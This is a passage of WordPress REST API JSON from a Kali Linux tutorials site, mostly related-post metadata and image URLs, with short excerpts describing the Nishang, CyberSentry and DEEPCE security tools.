Usage Import all the scripts in the current PowerShell session (PowerShell v3 onwards). PS C:\\nishang> Import-Module .\\nishang.psm1 Use\u2026","rel":"","context":"In &quot;Kali Linux&quot;","block_context":{"text":"Kali Linux","link":"https:\/\/kalilinuxtutorials.com\/category\/kali\/"},"img":{"alt_text":"","src":"","width":0,"height":0},"classes":[]},{"id":32974,"url":"https:\/\/kalilinuxtutorials.com\/cybersentry\/","url_meta":{"origin":5432,"position":4},"title":"CyberSentry &#8211; Automated Web Vulnerability Scanner","author":"Varshini","date":"May 7, 2024","format":false,"excerpt":"CyberSentry\u00a0is a robust automated scanning tool designed for web applications. It helps security professionals, ethical hackers, and developers detect and resolve vulnerabilities to strengthen their web environments. Features Multiple Vulnerability Tests: Includes tests for SQL Injection, XSS, and HTTP Parameter tampering. Extensive Coverage: Capable of scanning various frameworks and databases,\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhY0CXmZQippv0YaCQCC9JcgASH_ly_vZkZxOhgNU2_pozrazbUFunX0e7fRodt3K_0YfUhqLQ6U-49PVhlYISOZAyiqo6MKYsCeB3evxY-1jBCd71MPnbSgMsvJsEahjxI31CxSenhUKeBvRhdVgvLChrKEz9tkWdnqXMOJPTj-fxc-Y_tv_96bpMfE8SU\/s16000\/CyberSentry.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhY0CXmZQippv0YaCQCC9JcgASH_ly_vZkZxOhgNU2_pozrazbUFunX0e7fRodt3K_0YfUhqLQ6U-49PVhlYISOZAyiqo6MKYsCeB3evxY-1jBCd71MPnbSgMsvJsEahjxI31CxSenhUKeBvRhdVgvLChrKEz9tkWdnqXMOJPTj-fxc-Y_tv_96bpMfE8SU\/s16000\/CyberSentry.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhY0CXmZQippv0YaCQCC9JcgASH_ly_vZkZxOhgNU2_pozrazbUFunX0e7fRodt3K_0YfUhqLQ6U-49PVhlYISOZAyiqo6MKYsCeB3evxY-1jBCd71MPnbSgMsvJsEahjxI31CxSenhUKeBvRhdVgvLChrKEz9tkWdnqXMOJPTj-fxc-Y_tv_96bpMfE8SU\/s16000\/CyberSentry.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhY0CXmZQippv0YaCQCC9JcgASH_ly_vZkZxOhgNU2_pozrazbUFunX0e7fRodt3K_0YfUhqLQ6U-49PVhlYISOZAyiqo6MKYsCeB3evxY-1jBCd71MPnbSgMsvJsEahjxI31CxSenhUKeBvRhdVgvLChrKEz9tkWdnqXMOJPTj-fxc-Y_tv_96bpMfE8SU\/s16000\/CyberSentry.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhY0CXmZQippv0YaCQCC9JcgASH_ly_vZkZxOhgNU2_pozrazbUFunX0e7fRodt3K_0YfUhqLQ6U-49PVhlYISOZAyiqo6MKYsCeB3evxY-1jBCd71MPnbSgMsvJsEahjxI31CxSenhUKeBvRhdVgvLChrKEz9tkWdnqXMOJPTj-fxc-Y_tv_96bpMfE8SU\/s16000\/CyberSentry.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEhY0CXmZQippv0YaCQCC9JcgASH_ly_vZkZxOhgNU2_pozrazbUFunX0e7fRodt3K_0YfUhqLQ6U-49PVhlYISOZAyiqo6MKYsCeB3evxY-1jBCd71MPnbSgMsvJsEahjxI31CxSenhUKeBvRhdVgvLChrKEz9tkWdnqXMOJPTj-fxc-Y_tv_96bpMfE8SU\/s16000\/CyberSentry.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]},{"id":30259,"url":"https:\/\/kalilinuxtutorials.com\/deepce\/","url_meta":{"origin":5432,"position":5},"title":"DEEPCE &#8211; Docker&#8217;s Ultimate Security Toolkit","author":"Varshini","date":"September 14, 2023","format":false,"excerpt":"Tailored for professionals who seek to elevate their Docker container security game, this powerful suite offers advanced enumeration, privilege escalation, and container escape functionalities. Designed with utmost compatibility in mind, DEEPCE operates in pure sh, ensuring it seamlessly integrates into any container environment. ## . ## ## ## == ##\u2026","rel":"","context":"In &quot;Cyber security&quot;","block_context":{"text":"Cyber security","link":"https:\/\/kalilinuxtutorials.com\/category\/cyber-security\/"},"img":{"alt_text":"","src":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjtC6nO1lrTQ4AOFdqRWwYJ35QLm_c1H4f6Ewhp97GgqchwgCpVBudTkBW4dPta6kWwxuwVxSruXZ0xrjMpjaUYMxcWS4dJpx_dDcHAL1dv8UK01uLTRWVbM-FbCJN_kl9qlpXUAWfvvhBYl9BVHTrQUL9CtW7T_4dcEDPPWtZuP800udKi74DQoBStlw\/s16000\/deepce.webp?resize=350%2C200&ssl=1","width":350,"height":200,"srcset":"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjtC6nO1lrTQ4AOFdqRWwYJ35QLm_c1H4f6Ewhp97GgqchwgCpVBudTkBW4dPta6kWwxuwVxSruXZ0xrjMpjaUYMxcWS4dJpx_dDcHAL1dv8UK01uLTRWVbM-FbCJN_kl9qlpXUAWfvvhBYl9BVHTrQUL9CtW7T_4dcEDPPWtZuP800udKi74DQoBStlw\/s16000\/deepce.webp?resize=350%2C200&ssl=1 1x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjtC6nO1lrTQ4AOFdqRWwYJ35QLm_c1H4f6Ewhp97GgqchwgCpVBudTkBW4dPta6kWwxuwVxSruXZ0xrjMpjaUYMxcWS4dJpx_dDcHAL1dv8UK01uLTRWVbM-FbCJN_kl9qlpXUAWfvvhBYl9BVHTrQUL9CtW7T_4dcEDPPWtZuP800udKi74DQoBStlw\/s16000\/deepce.webp?resize=525%2C300&ssl=1 1.5x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjtC6nO1lrTQ4AOFdqRWwYJ35QLm_c1H4f6Ewhp97GgqchwgCpVBudTkBW4dPta6kWwxuwVxSruXZ0xrjMpjaUYMxcWS4dJpx_dDcHAL1dv8UK01uLTRWVbM-FbCJN_kl9qlpXUAWfvvhBYl9BVHTrQUL9CtW7T_4dcEDPPWtZuP800udKi74DQoBStlw\/s16000\/deepce.webp?resize=700%2C400&ssl=1 2x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjtC6nO1lrTQ4AOFdqRWwYJ35QLm_c1H4f6Ewhp97GgqchwgCpVBudTkBW4dPta6kWwxuwVxSruXZ0xrjMpjaUYMxcWS4dJpx_dDcHAL1dv8UK01uLTRWVbM-FbCJN_kl9qlpXUAWfvvhBYl9BVHTrQUL9CtW7T_4dcEDPPWtZuP800udKi74DQoBStlw\/s16000\/deepce.webp?resize=1050%2C600&ssl=1 3x, https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjtC6nO1lrTQ4AOFdqRWwYJ35QLm_c1H4f6Ewhp97GgqchwgCpVBudTkBW4dPta6kWwxuwVxSruXZ0xrjMpjaUYMxcWS4dJpx_dDcHAL1dv8UK01uLTRWVbM-FbCJN_kl9qlpXUAWfvvhBYl9BVHTrQUL9CtW7T_4dcEDPPWtZuP800udKi74DQoBStlw\/s16000\/deepce.webp?resize=1400%2C800&ssl=1 4x"},"classes":[]}],"_links":{"self":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/5432","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/comments?post=5432"}],"version-history":[{"count":0,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/posts\/5432\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media\/15623"}],"wp:attachment":[{"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/media?parent=5432"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/categories?post=5432"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/kalilinuxtutorials.com\/wp-json\/wp\/v2\/tags?post=5432"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}